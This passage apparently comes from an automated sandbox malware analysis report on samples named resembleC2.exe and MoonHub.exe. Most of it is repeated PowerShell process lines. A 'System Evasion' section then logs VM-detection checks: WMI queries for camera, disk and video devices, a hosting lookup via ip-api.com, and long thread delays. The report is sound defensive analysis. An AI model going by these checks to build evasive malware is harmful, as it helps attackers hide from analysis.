                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Check if machine is in data center or colocation facility
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = 'Camera'
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\resembleC2.exeMemory allocated: 13D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeMemory allocated: 1B000000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeMemory allocated: 3670000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeMemory allocated: 1BBD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeMemory allocated: 15658920000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeMemory allocated: 156723D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597875Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597766Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597641Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597531Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597422Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597311Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597203Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597094Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596981Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596870Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596485Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596281Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596166Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596062Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595943Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595813Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595703Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595593Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595484Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595375Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595266Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595156Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595045Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594938Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594813Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594688Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594578Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594469Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594344Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594232Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594016Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593795Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593670Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593562Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593453Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593340Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593234Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593014Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592792Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592684Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592578Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592466Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592359Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592250Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
